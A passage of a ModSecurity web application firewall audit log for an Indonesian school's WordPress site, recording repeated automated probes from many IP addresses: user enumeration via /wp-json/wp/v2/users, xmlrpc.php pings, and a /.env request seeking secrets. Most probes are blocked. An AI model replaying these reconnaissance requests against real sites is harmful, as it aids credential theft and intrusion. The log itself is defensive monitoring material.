"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746692505140507 3081 (- - -) Stopwatch2: 1746692505140507 3081; combined=1647, p1=487, p2=1132, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a396b845-Z-- --105ca61f-A-- [08/May/2025:15:56:15 +0700] aBxxr6cs1DvJ_HgMHE85FAAAAAs 103.236.140.4 44154 103.236.140.4 8181 --105ca61f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --105ca61f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105ca61f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746694575586768 2332 (- - -) Stopwatch2: 1746694575586768 2332; combined=1247, p1=415, p2=798, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105ca61f-Z-- --92210d19-A-- [08/May/2025:15:56:22 +0700] aBxxto4K347NtBcwXKxEngAAAIE 103.236.140.4 44418 103.236.140.4 8181 --92210d19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --92210d19-C-- demo.sayHello --92210d19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --92210d19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746694582102973 5786 (- - -) Stopwatch2: 1746694582102973 5786; combined=4351, p1=595, p2=3502, p3=31, p4=61, p5=95, sr=102, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92210d19-Z-- --71bb3479-A-- [08/May/2025:16:11:25 +0700] aBx1PSs5rYyn3jlLjjL-hwAAAMA 103.236.140.4 52496 103.236.140.4 8181 --71bb3479-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71bb3479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71bb3479-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695485500502 2490 (- - -) Stopwatch2: 1746695485500502 2490; combined=1168, p1=375, p2=764, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71bb3479-Z-- --356f6b71-A-- [08/May/2025:16:15:23 +0700] aBx2K6cs1DvJ_HgMHE9HXAAAABM 103.236.140.4 33838 103.236.140.4 8181 --356f6b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --356f6b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --356f6b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695723903366 2716 (- - -) Stopwatch2: 1746695723903366 2716; combined=1211, p1=398, p2=785, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --356f6b71-Z-- --a500da28-A-- [08/May/2025:16:15:30 +0700] aBx2Mis5rYyn3jlLjjIBcQAAAMQ 103.236.140.4 34106 103.236.140.4 8181 --a500da28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a500da28-C-- demo.sayHello --a500da28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a500da28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695730519526 5634 (- - -) Stopwatch2: 1746695730519526 5634; combined=4022, p1=525, p2=3287, p3=33, p4=32, p5=85, sr=67, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a500da28-Z-- --7c482466-A-- [08/May/2025:16:17:42 +0700] aBx2to4K347NtBcwXKxOyQAAAJY 103.236.140.4 39384 103.236.140.4 8181 --7c482466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c482466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c482466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695862083397 2543 (- - -) Stopwatch2: 1746695862083397 2543; combined=1164, p1=394, p2=739, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c482466-Z-- --50f7600d-A-- [08/May/2025:16:17:47 +0700] aBx2u6cs1DvJ_HgMHE9JGwAAAAs 103.236.140.4 39588 103.236.140.4 8181 --50f7600d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50f7600d-C-- demo.sayHello --50f7600d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50f7600d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695867160832 5949 (- - -) Stopwatch2: 1746695867160832 5949; combined=4384, p1=562, p2=3535, p3=31, p4=96, p5=95, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50f7600d-Z-- --b212fe16-A-- [08/May/2025:16:19:43 +0700] aBx3L44K347NtBcwXKxP_gAAAJE 103.236.140.4 44246 103.236.140.4 8181 --b212fe16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b212fe16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b212fe16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695983573803 3282 (- - -) Stopwatch2: 1746695983573803 3282; combined=1486, p1=496, p2=952, p3=0, p4=0, p5=37, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b212fe16-Z-- --a3196828-A-- [08/May/2025:16:19:48 +0700] aBx3NMP9GxxPAbCroFYXzgAAAFY 103.236.140.4 44438 103.236.140.4 8181 --a3196828-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3196828-C-- demo.sayHello --a3196828-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3196828-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695988223792 5571 (- - -) Stopwatch2: 1746695988223792 5571; combined=4147, p1=546, p2=3393, p3=30, p4=33, p5=87, sr=68, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3196828-Z-- --d4d03876-A-- [08/May/2025:16:20:49 +0700] aBx3cY4K347NtBcwXKxQogAAAIo 103.236.140.4 46882 103.236.140.4 8181 --d4d03876-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4d03876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4d03876-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746696049177965 2784 (- - -) Stopwatch2: 1746696049177965 2784; combined=1264, p1=428, p2=804, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4d03876-Z-- --561bcb15-A-- [08/May/2025:16:20:58 +0700] aBx3eo4K347NtBcwXKxQqwAAAIM 103.236.140.4 47278 103.236.140.4 8181 --561bcb15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --561bcb15-C-- demo.sayHello --561bcb15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --561bcb15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746696058969121 5849 (- - -) Stopwatch2: 1746696058969121 5849; combined=4368, p1=570, p2=3571, p3=33, p4=35, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --561bcb15-Z-- --d1714c0c-A-- [08/May/2025:16:56:09 +0700] aBx_ucP9GxxPAbCroFYhyQAAAEA 103.236.140.4 58914 103.236.140.4 8181 --d1714c0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1714c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1714c0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698169278454 2275 (- - -) Stopwatch2: 1746698169278454 2275; combined=1227, p1=400, p2=794, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1714c0c-Z-- --f1670c77-A-- [08/May/2025:16:56:12 +0700] aBx_vKcs1DvJ_HgMHE9WnAAAAAA 103.236.140.4 58930 103.236.140.4 8181 --f1670c77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1670c77-C-- demo.sayHello --f1670c77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1670c77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746698172561949 5545 (- - -) Stopwatch2: 1746698172561949 5545; combined=4058, p1=529, p2=3313, p3=24, p4=27, p5=98, sr=82, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1670c77-Z-- --13c4b446-A-- [08/May/2025:16:56:51 +0700] aBx_4ys5rYyn3jlLjjIPcgAAAMY 103.236.140.4 58946 103.236.140.4 8181 --13c4b446-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.88.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.88.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --13c4b446-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13c4b446-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746698211227206 740 (- - -) Stopwatch2: 1746698211227206 740; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c4b446-Z-- --1299276c-A-- [08/May/2025:16:56:55 +0700] aBx_5ys5rYyn3jlLjjIPcwAAANc 103.236.140.4 58948 103.236.140.4 8181 --1299276c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1299276c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1299276c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698215056467 1926 (- - -) Stopwatch2: 1746698215056467 1926; combined=809, p1=256, p2=534, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1299276c-Z-- --5814ed0e-A-- [08/May/2025:16:57:00 +0700] aBx_7Cs5rYyn3jlLjjIPdQAAAMg 103.236.140.4 58952 103.236.140.4 8181 --5814ed0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5814ed0e-C-- demo.sayHello --5814ed0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5814ed0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746698220167866 4576 (- - -) Stopwatch2: 1746698220167866 4576; combined=3601, p1=448, p2=2943, p3=26, p4=24, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5814ed0e-Z-- --328c9d68-A-- [08/May/2025:16:58:41 +0700] aByAUacs1DvJ_HgMHE9WngAAAAU 103.236.140.4 58976 103.236.140.4 8181 --328c9d68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.211.143.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.211.143.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --328c9d68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --328c9d68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg 